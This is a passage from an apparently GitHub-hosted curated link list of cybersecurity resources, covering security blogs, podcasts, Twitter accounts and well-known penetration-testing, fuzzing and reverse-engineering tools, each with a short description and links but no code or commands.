Miessler</b></a> - cybersecurity expert and writer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://samy.pl/">🌎 <b>Samy Kamkar</b></a> - is an American privacy and security researcher, computer hacker.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.j4vv4d.com/">🌎 <b>Javvad Malik</b></a> - is a security advocate at AlienVault, a blogger event speaker and industry commentator.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.grahamcluley.com/">🌎 <b>Graham Cluley</b></a> - public speaker and independent computer security analyst.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://security.szurek.pl/">🌎 <b>Kacper Szurek</b></a> - detection engineer at ESET.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.troyhunt.com/">🌎 <b>Troy Hunt</b></a> - web security expert known for public education and outreach on security topics.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://raymii.org/s/index.html">🌎 <b>raymii.org</b></a> - sysadmin specializing in building high availability cloud environments.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://robert.penz.name/">🌎 <b>Robert Penz</b></a> - IT security expert.<br> </p> ##### :black_small_square: Geeky Blogs <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://linux-audit.com/">🌎 <b>Linux Audit</b></a> - the Linux security blog about auditing, hardening and compliance by Michael Boelen.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://linuxsecurity.expert/"><b> Linux Security Expert</b></a> - trainings, howtos, checklists, security tools, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.grymoire.com/"><b>The Grymoire</b></a> - collection of useful incantations for wizards, be you computer wizards, magicians, or whatever.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.secjuice.com">🌎 <b>Secjuice</b></a> - is the only non-profit, independent and volunteer led publication in the information security space.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://duo.com/decipher">🌎 <b>Decipher</b></a> - security news that informs and inspires.<br> </p> ##### :black_small_square: Geeky Vendor Blogs <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.tenable.com/podcast">🌎 <b>Tenable Podcast</b></a> - conversations and interviews related to Cyber Exposure, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nakedsecurity.sophos.com/">🌎 <b>Sophos</b></a> - threat news room, giving you news, opinion, advice and research on computer security issues.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.tripwire.com/state-of-security/">🌎 <b>Tripwire State of Security</b></a> - blog featuring the latest news, trends and insights on current security issues.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://blog.malwarebytes.com/">🌎 <b>Malwarebytes Labs Blog</b></a> - security blog aims to provide insider news about cybersecurity.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.trustedsec.com/category/articles/">🌎 <b>TrustedSec</b></a> - latest news, and trends about cybersecurity.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://portswigger.net/blog">🌎 <b>PortSwigger Web Security Blog</b></a> - about web app security vulns and top tips from our team of web security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.alienvault.com/blogs">🌎 <b>AT&T Cybersecurity blog</b></a> - news on emerging threats and practical advice to simplify threat detection.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://thycotic.com/company/blog/">🌎 <b>Thycotic</b></a> - where CISOs and IT Admins come to learn about industry trends, IT security, and more.<br> </p> ##### :black_small_square: Geeky Cybersecurity Podcasts <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://risky.biz/netcasts/risky-business/">🌎 <b>Risky Business</b></a> - is a weekly information security podcast featuring news and in-depth interviews.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.vice.com/en_us/topic/cyber">🌎 <b>Cyber, by Motherboard</b></a> - stories, and focus on the ideas about cybersecurity.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.tenable.com/podcast">🌎 <b>Tenable Podcast</b></a> - conversations and interviews related to Cyber Exposure, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://podcasts.apple.com/gb/podcast/cybercrime-investigations/id1428801405"><b> Cybercrime Investigations</b></a> - podcast by Geoff White about cybercrimes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://themanyhats.club/tag/episodes/">🌎 <b>The many hats club</b></a> - featuring stories from a wide range of Infosec people (Whitehat, Greyhat and Blackhat).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://darknetdiaries.com/">🌎 <b>Darknet Diaries</b></a> - true stories from the dark side of the Internet.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/playlist?list=PL423I_gHbWUXah3dmt_q_XNp0NlGAKjis">🌎 <b>OSINTCurious Webcasts</b></a> - is the investigative curiosity that helps people be successful in OSINT.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/user/SecurityWeeklyTV">🌎 <b>Security Weekly</b></a> - the latest information security and hacking news.<br> </p> ##### :black_small_square: Geeky Cybersecurity Video Blogs <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/channel/UCzvJStjySZVvOBsPl-Vgj0g">🌎 <b>rev3rse security</b></a> - offensive, binary exploitation, web app security, hardening, red team, blue team.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w">🌎 <b>LiveOverflow</b></a> - a lot more advanced topics than what is typically offered in paid online courses - but for free.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/infoseccynic">🌎 <b>J4vv4D</b></a> - the important information regarding our internet security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cybertalks.co.uk/"><b> CyberTalks</b></a> - talks, interviews, and article about cybersecurity.<br> </p> ##### :black_small_square: Best Personal Twitter Accounts <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/blackroomsec">🌎 <b>@blackroomsec</b></a> - a white-hat hacker/pentester. Intergalactic Minesweeper Champion 1990.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/MarcoCiappelli">🌎 <b>@MarcoCiappelli</b></a> - Co-Founder @ITSPmagazine, at the intersection of IT security and society.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/binitamshah">🌎 <b>@binitamshah</b></a> - Linux Evangelist. Malwares. Kernel Dev. Security Enthusiast.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/joe_carson">🌎 <b>@joe_carson</b></a> - an InfoSec Professional and Tech Geek.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/mikko">🌎 <b>@mikko</b></a> - CRO at F-Secure, Reverse Engineer, TED Speaker, Supervillain.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/esrtweet">🌎 <b>@esrtweet</b></a> - often referred to as ESR, is an American software developer, and open-source software advocate.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/gynvael">🌎 <b>@gynvael</b></a> - security researcher/programmer, @DragonSectorCTF founder/player, technical streamer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/x0rz">🌎 <b>@x0rz</b></a> - Security Researcher & Cyber Observer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/hasherezade">🌎 <b>@hasherezade</b></a> - programmer, malware analyst. Author of PEbear, PEsieve, libPeConv.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/TinkerSec">🌎 <b>@TinkerSec</b></a> - tinkerer, cypherpunk, hacker.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/alisaesage">🌎 <b>@alisaesage</b></a> - independent hacker and researcher.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/SwiftOnSecurity">🌎 <b>@SwiftOnSecurity</b></a> - systems security, industrial safety, sysadmin, author of decentsecurity.com.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/dakami">🌎 <b>@dakami</b></a> - is one of just seven people with the authority to restore the DNS root keys.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/samykamkar">🌎 <b>@samykamkar</b></a> - is a famous "grey hat" hacker, security researcher, creator of the MySpace "Samy" worm.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/securityweekly">🌎 <b>@securityweekly</b></a> - founder & CTO of Security Weekly podcast network.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/jack_daniel">🌎 <b>@jack_daniel</b></a> - @SecurityBSides co-founder.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/thegrugq">🌎 <b>@thegrugq</b></a> - Security Researcher.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/matthew_d_green">🌎 <b>@matthew_d_green</b></a> - a cryptographer and professor at Johns Hopkins University.<br> </p> ##### :black_small_square: Best Commercial Twitter Accounts <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/haveibeenpwned">🌎 <b>@haveibeenpwned</b></a> - check if you have an account that has been compromised in a data breach.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/bugcrowd">🌎 <b>@bugcrowd</b></a> - trusted by more of the Fortune 500 than any other crowdsourced security platform.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/Malwarebytes">🌎 <b>@Malwarebytes</b></a> - most trusted security company. Unmatched threat visibility.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/sansforensics">🌎 <b>@sansforensics</b></a> - the world's leading Digital Forensics and Incident Response provider.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/attcyber">🌎 <b>@attcyber</b></a> - AT&T Cybersecurity’s Edge-to-Edge technologies provide threat intelligence, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/TheManyHatsClub">🌎 <b>@TheManyHatsClub</b></a> - an information security focused podcast and group of individuals from all walks of life.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/hedgehogsec">🌎 <b>@hedgehogsec</b></a> - Hedgehog Cyber. Gibraltar and Manchester's top boutique information security firm.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/NCSC">🌎 <b>@NCSC</b></a> - the National Cyber Security Centre. Helping to make the UK the safest place to live and work online.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/Synacktiv">🌎 <b>@Synacktiv</b></a> - IT security experts.<br> </p> ##### :black_small_square: A piece of history <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://web.archive.org/web/20190221103734/https://ftp.arl.army.mil/~mike/howto/"><b>How to Do Things at ARL</b></a> - how to configure modems, scan images, record CD-ROMs, and other.<b>*</b><br> </p> ##### :black_small_square: Other <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/watch?v=3QnD2c4Xovk">🌎 <b>Diffie-Hellman Key Exchange (short version)</b></a> - how Diffie-Hellman Key Exchange worked.<br> </p> #### Hacking/Penetration Testing &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Pentesters arsenal tools <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.syhunt.com/sandcat/"><b>Sandcat Browser</b></a> - a penetration-oriented browser with plenty of advanced functionality already built in.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.metasploit.com/">🌎 <b>Metasploit</b></a> - tool and framework for pentesting system, web and many more, contains a lot a ready to use exploit.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://portswigger.net/burp">🌎 <b>Burp Suite</b></a> - tool for testing web app security, intercepting proxy to replay, inject, scan and fuzz.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project">🌎 <b>OWASP Zed Attack Proxy</b></a> - intercepting proxy to replay, inject, scan and fuzz HTTP requests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://w3af.org/"><b>w3af</b></a> - is a Web Application Attack and Audit Framework.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://mitmproxy.org/">🌎 <b>mitmproxy</b></a> - an interactive TLS-capable intercepting HTTP proxy for penetration testers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cirt.net/Nikto2">🌎 <b>Nikto2</b></a> - web server scanner which performs comprehensive tests against web servers for multiple items.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://sqlmap.org/"><b>sqlmap</b></a> - tool that automates the process of detecting and exploiting SQL injection flaws.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2830⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;520🍴</code></b> <a href="https://github.com/lanmaster53/recon-ng"><b>Recon-ng</b></a></a> - is a full-featured Web Reconnaissance framework written in Python.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;4242⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;801🍴</code></b> <a href="https://github.com/Tib3rius/AutoRecon"><b>AutoRecon</b></a></a> - is a network reconnaissance tool which performs automated enumeration of services.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.faradaysec.com/">🌎 <b>Faraday</b></a> - an Integrated Multiuser Pentest Environment.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;9899⭐</code></b> <b><code>&nbsp;&nbsp;1426🍴</code></b> <a href="https://github.com/s0md3v/Photon"><b>Photon</b></a></a> - incredibly fast crawler designed for OSINT.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;11868⭐</code></b> <b><code>&nbsp;&nbsp;1806🍴</code></b> <a href="https://github.com/s0md3v/XSStrike"><b>XSStrike</b></a></a> - most advanced XSS detection suite.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;6736⭐</code></b> <b><code>&nbsp;&nbsp;1714🍴</code></b> <a href="https://github.com/1N3/Sn1per"><b>Sn1per</b></a></a> - automated pentest framework for offensive security experts.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;10194⭐</code></b> <b><code>&nbsp;&nbsp;1134🍴</code></b> <a href="https://github.com/future-architect/vuls"><b>vuls</b></a></a> - is an agent-less vulnerability scanner for Linux, FreeBSD, and other.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;7909⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;875🍴</code></b> <a href="https://github.com/google/tsunami-security-scanner"><b>tsunami</b></a></a> - is a general purpose network security scanner with an extensible plugin system.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;5229⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;864🍴</code></b> <a href="https://github.com/michenriksen/aquatone"><b>aquatone</b></a></a> - a tool for domain flyovers.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?🍴</code></b> <a href="https://github.com/GitHackTools/BillCipher"><b>BillCipher</b></a></a> - information gathering tool for a website or IP address.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2337⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;434🍴</code></b> <a href="https://github.com/Ekultek/WhatWaf"><b>WhatWaf</b></a></a> - detect and bypass web application firewalls and protection systems.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1157⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;161🍴</code></b> <a href="https://github.com/s0md3v/Corsy"><b>Corsy</b></a></a> - CORS misconfiguration scanner.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2857⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;394🍴</code></b> <a href="https://github.com/evyatarmeged/Raccoon"><b>Raccoon</b></a></a> - is a high performance offensive security tool for reconnaissance and vulnerability scanning.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1490⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;216🍴</code></b> <a href="https://github.com/Nekmo/dirhunt"><b>dirhunt</b></a></a> - find web directories without bruteforce.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.openwall.com/john/">🌎 <b>John The Ripper</b></a> - is a fast password cracker, currently available for many flavors of Unix, Windows, and other.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hashcat.net/hashcat/">🌎 <b>hashcat</b></a> - world's fastest and most advanced password recovery utility.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://lcamtuf.coredump.cx/p0f3/"><b>p0f</b></a> - is a tool to identify the players behind any incidental TCP/IP communications.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;794⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;115🍴</code></b> <a href="https://github.com/mozilla/ssh_scan"><b>ssh_scan</b></a></a> - a prototype SSH configuration and policy scanner.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1234⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;308🍴</code></b> <a href="https://github.com/woj-ciech/LeakLooker"><b>LeakLooker</b></a></a> - find open databases - powered by Binaryedge.io<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;7630⭐</code></b> <b><code>&nbsp;&nbsp;1953🍴</code></b> <a href="https://github.com/offensive-security/exploitdb"><b>exploitdb</b></a></a> - searchable archive from The Exploit Database.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1639⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;253🍴</code></b> <a href="https://github.com/vulnersCom/getsploit"><b>getsploit</b></a></a> - is a command line utility for searching and downloading exploits.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;7573⭐</code></b> <b><code>&nbsp;&nbsp;1812🍴</code></b> <a href="https://github.com/zardus/ctf-tools"><b>ctf-tools</b></a></a> - some setup scripts for security research tools.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;10501⭐</code></b> <b><code>&nbsp;&nbsp;1628🍴</code></b> <a href="https://github.com/Gallopsled/pwntools"><b>pwntools</b></a></a> - CTF framework and exploit development library.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;707⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;162🍴</code></b> <a href="https://github.com/bl4de/security-tools"><b>security-tools</b></a></a> - collection of small security tools created mostly in Python. CTFs, pentests and so on.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;586⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;263🍴</code></b> <a href="https://github.com/leonteale/pentestpackage"><b>pentestpackage</b></a></a> - is a package of Pentest scripts.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2580⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;802🍴</code></b> <a href="https://github.com/dloss/python-pentest-tools"><b>python-pentest-tools</b></a></a> - python tools for penetration testers.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;7569⭐</code></b> <b><code>&nbsp;&nbsp;2086🍴</code></b> <a href="https://github.com/fuzzdb-project/fuzzdb"><b>fuzzdb</b></a></a> - dictionary of attack patterns and primitives for black-box application fault injection.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3203⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;573🍴</code></b> <a href="https://github.com/google/AFL"><b>AFL</b></a></a> - is a free software fuzzer maintained by Google.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3879⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;787🍴</code></b> <a href="https://github.com/AFLplusplus/AFLplusplus"><b>AFL++</b></a></a> - is AFL with community patches.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;4794⭐</code></b> <b><code>&nbsp;&nbsp;1156🍴</code></b> <a href="https://github.com/google/syzkaller"><b>syzkaller</b></a></a> - is an unsupervised, coverage-guided kernel fuzzer.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;5870⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;783🍴</code></b> <a href="https://github.com/pwndbg/pwndbg"><b>pwndbg</b></a></a> - exploit development and reverse engineering with GDB made easy.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;5505⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;802🍴</code></b> <a href="https://github.com/longld/peda"><b>GDB PEDA</b></a></a> - Python Exploit Development Assistance for GDB.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hex-rays.com/products/ida/index.shtml">🌎 <b>IDA</b></a> - multi-processor disassembler and debugger useful for reverse engineering malware.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;18459⭐</code></b> <b><code>&nbsp;&nbsp;2898🍴</code></b> <a href="https://github.com/radare/radare2"><b>radare2</b></a></a> - framework for reverse-engineering and analyzing binaries.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;11314⭐</code></b> <b><code>&nbsp;&nbsp;2299🍴</code></b> <a href="https://github.com/threat9/routersploit"><b>routersploit</b></a></a> - exploitation framework for embedded devices.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;41778⭐</code></b> <b><code>&nbsp;&nbsp;5069🍴</code></b> <a href="https://github.com/NationalSecurityAgency/ghidra"><b>Ghidra</b></a></a> - is a software reverse engineering (SRE) framework.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cutter.re/">🌎 <b>Cutter</b></a> - is an SRE platform integrating Ghidra's decompiler.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;593⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;162🍴</code></b> <a href="https://github.com/salesforce/vulnreport"><b>Vulnreport</b></a></a> - open-source pentesting management and automation platform by Salesforce Product Security.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1589⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;239🍴</code></b> <a href="https://github.com/sc0tfree/mentalist"><b>Mentalist</b></a></a> - is a graphical tool for custom wordlist generation.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2116⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;506🍴</code></b> <a href="https://github.com/archerysec/archerysec"><b>archerysec</b></a></a> - vulnerability assessment and management helps to perform scans and manage vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;4598⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;837🍴</code></b> <a href="https://github.com/j3ssie/Osmedeus"><b>Osmedeus</b></a></a> - fully automated offensive security tool for reconnaissance and vulnerability scanning.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;8661⭐</code></b> <b><code>&nbsp;&nbsp;1994🍴</code></b> <a href="https://github.com/beefproject/beef"><b>beef</b></a></a> - the browser exploitation framework project.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;4812⭐</code></b> <b><code>&nbsp;&nbsp;1156🍴</code></b> <a href="https://github.com/NullArray/AutoSploit"><b>AutoSploit</b></a></a> - automated mass exploiter.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1954⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;242🍴</code></b> <a href="https://github.com/TH3xACE/SUDO_KILLER"><b>SUDO_KILLER</b></a></a> - is a tool to identify and exploit sudo rules' misconfigurations and vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;6944⭐</code></b> <b><code>&nbsp;&nbsp;1369🍴</code></b> <a href="https://github.com/VirusTotal/yara"><b>yara</b></a></a> - the pattern matching swiss knife.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;17606⭐</code></b> <b><code>&nbsp;&nbsp;3391🍴</code></b> <a href="https://github.com/gentilkiwi/mimikatz"><b>mimikatz</b></a></a> - a little tool to play with Windows security.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;42746⭐</code></b> <b><code>&nbsp;&nbsp;5227🍴</code></b> <a href="https://github.com/sherlock-project/sherlock"><b>sherlock</b></a></a> - hunt down social media accounts by username across social networks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://owasp.org/www-project-threat-dragon/">🌎 <b>OWASP Threat Dragon</b></a> - is a tool used to create threat model diagrams and to record possible threats.<br> </p> ##### :black_small_square: Pentests bookmarks collection <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.pentest-standard.org/index.php/Main_Page"><b>PTES</b></a> - the penetration testing execution standard.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.amanhardikar.com/mindmaps/Practice.html">🌎 <b>Pentests MindMap</b></a> - amazing mind map with vulnerable apps and systems.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.amanhardikar.com/mindmaps/webapptest.html">🌎 <b>WebApps Security Tests MindMap</b></a> - incredible mind map for WebApps security tests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://brutelogic.com.br/blog/">🌎 <b>Brute XSS</b></a> - master the art of Cross Site Scripting.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet">🌎 <b>XSS cheat sheet</b></a> - contains many vectors that can help you bypass WAFs and filters.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://jivoi.github.io/2015/07/03/offensive-security-bookmarks/">🌎 <b>Offensive Security Bookmarks</b></a> - security bookmarks collection, all things that author need to pass OSCP.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3450⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;747🍴</code></b> <a href="https://github.com/coreb1t/awesome-pentest-cheat-sheets"><b>Awesome Pentest Cheat Sheets</b></a></a> - collection of the cheat sheets useful for pentesting.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;68044⭐</code></b> <b><code>&nbsp;&nbsp;8625🍴</code></b> <a href="https://github.com/Hack-with-Github/Awesome-Hacking"><b>Awesome Hacking by HackWithGithub</b></a></a> - awesome lists for hackers, pentesters and security researchers.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;10633⭐</code></b> <b><code>&nbsp;&nbsp;1476🍴</code></b> <a href="https://github.com/carpedm20/awesome-hacking"><b>Awesome Hacking by carpedm20</b></a></a> - a curated list of awesome hacking tutorials, tools and resources.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;13745⭐</code></b> <b><code>&nbsp;&nbsp;2033🍴</code></b> <a href="https://github.com/vitalysim/Awesome-Hacking-Resources"><b>Awesome Hacking Resources</b></a></a> - collection of hacking/penetration testing resources to make you better.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;18942⭐</code></b> <b><code>&nbsp;&nbsp;4273🍴</code></b> <a href="https://github.com/enaqx/awesome-pentest"><b>Awesome Pentest</b></a></a> - collection of awesome penetration testing resources, tools and other shiny things.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?🍴</code></b> <a href="https://github.com/m4ll0k/Awesome-Hacking-Tools"><b>Awesome-Hacking-Tools</b></a></a> - is a curated list of awesome Hacking Tools.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;235⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;82🍴</code></b> <a href="https://github.com/ksanchezcld/Hacking_Cheat_Sheet"><b>Hacking Cheat Sheet</b></a></a> - author hacking and pentesting notes.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3475⭐</code></b> <b><code>&nbsp;&nbsp;1130🍴</code></b> <a href="https://github.com/toolswatch/blackhat-arsenal-tools"><b>blackhat-arsenal-tools</b></a></a> - official Black Hat arsenal security tools repository.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.peerlyst.com/posts/the-complete-list-of-infosec-related-cheat-sheets-claus-cramon">🌎 <b>Penetration Testing and WebApp Cheat Sheets</b></a> - the complete list of Infosec related cheat sheets.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;14257⭐</code></b> <b><code>&nbsp;&nbsp;2422🍴</code></b> <a href="https://github.com/The-Art-of-Hacking/h4cker"><b>Cyber Security Resources</b></a></a> - includes thousands of cybersecurity-related references and resources.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;955⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;371🍴</code></b> <a href="https://github.com/jhaddix/pentest-bookmarks"><b>Pentest Bookmarks</b></a></a> - there are a LOT of pentesting blogs.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;4402⭐</code></b> <b><code>&nbsp;&nbsp;1234🍴</code></b> <a href="https://github.com/OlivierLaflamme/Cheatsheet-God"><b>Cheatsheet-God</b></a></a> - Penetration Testing Reference Bank - OSCP/PTP & PTX Cheatsheet.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3596⭐</code></b> 